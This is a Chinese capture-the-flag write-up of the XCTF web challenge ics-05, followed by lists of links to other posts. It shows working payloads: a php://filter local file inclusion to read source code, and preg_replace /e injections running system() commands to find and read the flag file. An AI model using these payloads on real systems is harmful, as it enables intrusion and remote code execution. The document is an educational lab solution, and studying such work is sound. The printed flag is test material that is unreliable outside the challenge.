本文借鉴以下两篇文章的指导

https://www.jianshu.com/p/5a502873635b

https://blog.csdn.net/about23/article/details/95349625

全部点击一遍,只有这个可以有其他界面

题目描述是 “其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统”

在后面添加login.php 无果,御剑扫描也无结果,源码也找不到其他东西

再次点击上面的“云平台设备维护中心”,URL栏有参数?page=index  存在get传值

page的参数联想到可能存在文件包含漏洞

引用上面的文章内容

LFI漏洞的黑盒判断方法:

单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞

输入数字没啥用,尝试读取index.php的源码,采用php伪协议





?page=php://filter/read=convert.base64-encode/resource=index.php




为什么中间要转base64编码,如果不转码,则相当于进行请求网页(继续打开网页)
输入payload得到一段base64




然后解码,分析源码




伪造XFF头来登入系统,同时利用preg_replace函数的漏洞


preg_replace( pattern , replacement , subject ) :


当pre_replace的参数pattern输入/e的时候 ,参数replacement的代码当作PHP代码执行
于是构造payload




/index.php?pat=/123/e&rep=system("find+-iname+flag")&sub=123




”+“号在url中会被解释成空格号,这里用%20也行


用burpsuite来设置XFF头




继续查看   %26被url解释成&号   用来连接命令


&& 前面命令为假直接报错,后面语句不执行(前面命令执行成功,后面的命令也执行)




index.php?pat=/123/e&rep=system("cd+./s3chahahaDir/flag%26%26ls")&sub=123






最后的payload




index.php?pat=/123/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=123






得flag


cyberpeace{a3f41e3943e9bd48b8084b29e4b27182}





												


											
攻防世界web之ics-05的更多相关文章
	

    
						
  1. CTF--web 攻防世界web题 robots  backup
		
    攻防世界web题 robots https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=506 ...
    
		
    2. 
						
  2. CTF--web 攻防世界web题 get_post
		
    攻防世界web题 get_post https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5 ...
    
		
    3. 
						
  3. 攻防世界 web进阶练习 NewsCenter
		
    攻防世界 web进阶练习 NewsCenter   题目是NewsCenter,没有提示信息.打开题目,有一处搜索框,搜索新闻.考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有 ...
    
		
    4. 
						
  4. XCTF攻防世界Web之WriteUp
		
    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...
    
		
    5. 
						
  5. 攻防世界web新手区
		
    攻防世界web新手区 第一题view_source 第二题get_post 第三题robots 第四题Backup 第五题cookie 第六题disabled_button 第七题simple_js  ...
    
		
    6. 
						
  6. XCTF攻防世界web进阶练习—mfw
		
    XCTF攻防世界web进阶练习-mfw题目为mfw,没有任何提示.直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化查看它的源码,看到有一个?page=fl ...
    
		
    7. 
						
  7. 攻防世界Web刷题记录(进阶区)
		
    攻防世界Web刷题记录(进阶区) 1.baby_web 发现去掉URLhttp://111.200.241.244:51461/1.php后面的1.php,还是会跳转到http://111.200.2 ...
    
		
    8. 
						
  8. 攻防世界Web刷题记录(新手区)
		
    攻防世界Web刷题记录(新手区) 1.ViewSource 题如其名 Fn + F12 2.get post 3.robots robots.txt是搜索引擎中访问网站的时候要查看的第一个文件.当一个 ...
    
		
    9. 
						
  9. 攻防世界Web区部分题解
		
    攻防世界Web区部分题解   前言:PHP序列化就是把代码中所有的 对象 , 类 , 数组 , 变量 , 匿名函数等全部转换为一个字符串 , 提供给用户传输和存储 . 而反序列化就是把字符串重新转换为 ...
    
		
    10. 
						
  10. 攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup
		
    攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup 题目介绍 题目考点 PHP代码审计 git源码泄露 Writeup 进入题目,点击一番,发现可能出现git ...
    
		
    11. 
		

	


随机推荐
	

    
									
  1. hidraw设备简要分析
			
    关键词:hid.hidraw.usbhid.hidp等等. 下面首先介绍hidraw设备主要用途,然后简要分析hidraw设备驱动(但是不涉及到相关USB/Bluwtooth驱动),最后分析用户空间接 ...
    
			
    2. 
						
  2. LInux:网络连接的设置
			
    主机名的配置 主机名的配置(配置文件/etc/hostname) 1.使用 hostname 命令临时设置主机名 命令格式:hostname [新主机名] 2.永久设置主机名 命令格式:hostnam ...
    
			
    3. 
						
  3. jira问题更改项目
			
    1.点击“问题”在问题中,筛选你要修改的问题,以下是以创建用户为搜索条件,然后点击“工具”---移动所有问题 2.选择要移动的问题,选择项目,进行移动
    
			
    4. 
						
  4. 飞思卡尔K60时钟分析
			
    推荐:NXP官方软件config tool,图形化界面可导出代码 K60芯片的时钟系统由振荡器(OSC).实时振荡器(RTC OSC).多功能时钟发生器(MCG).系统集成模块(SIM)和电源管理器( ...
    
			
    5. 
						
  5. 我的第一个Mybatis项目搭建
			
    1.新建maven项目,目录如下.第一个坑idea目录和eclipse不一样project就像workspace pom文件 jdk版本有点高建议8.0 <?xml version=" ...
    
			
    6. 
						
  6. WPf 带滚动条WrapPanel 自动换行 和控件右键菜单
			
    原文:WPf 带滚动条WrapPanel 自动换行 和控件右键菜单 技能点包括 WPf 样式的引用 数据的验证和绑定 比较适合初学者 前台: <Window.Resources> < ...
    
			
    7. 
						
  7. 使用composer安装Larave提示“Changed current directory to C:/Users/Administrator/AppData/Roaming/Composer”
			
    解决办法: 根据官方手册执行composer global require "laravel/installer" 显示Changed current directory to C ...
    
			
    8. 
						
  8. django--调用百度AI接口实现人脸注册登录
			
    面部识别----考勤打卡.注册登录.面部支付等等...感觉很高大上,又很方便,下面用python中的框架--django完成一个注册登录的功能,调用百度AI的接口,面部识别在网上也有好多教程,可以自己 ...
    
			
    9. 
						
  9. PHP中生成随机字符串,数字+大小写字母随机组合
			
    简单的生成随机字符串: /* * 生成随机字符串 * * $length 字符串长度 */ function random_str($length) { // 密码字符集,可任意添加你需要的字符 $c ...
    
			
    10. 
						
  10. 由浅入深,讲解 spring 实战详细使用——spring 源码篇
			
    首先,这篇文章不会详细的深入底层源码,只是基于注解和配置来说说我们的 spring 的使用,别小看基础,保证有你没用过的注解和配置,走起. 我们先来建立一个 maven 项目,引入 spring 文件 ...
    
			
    11.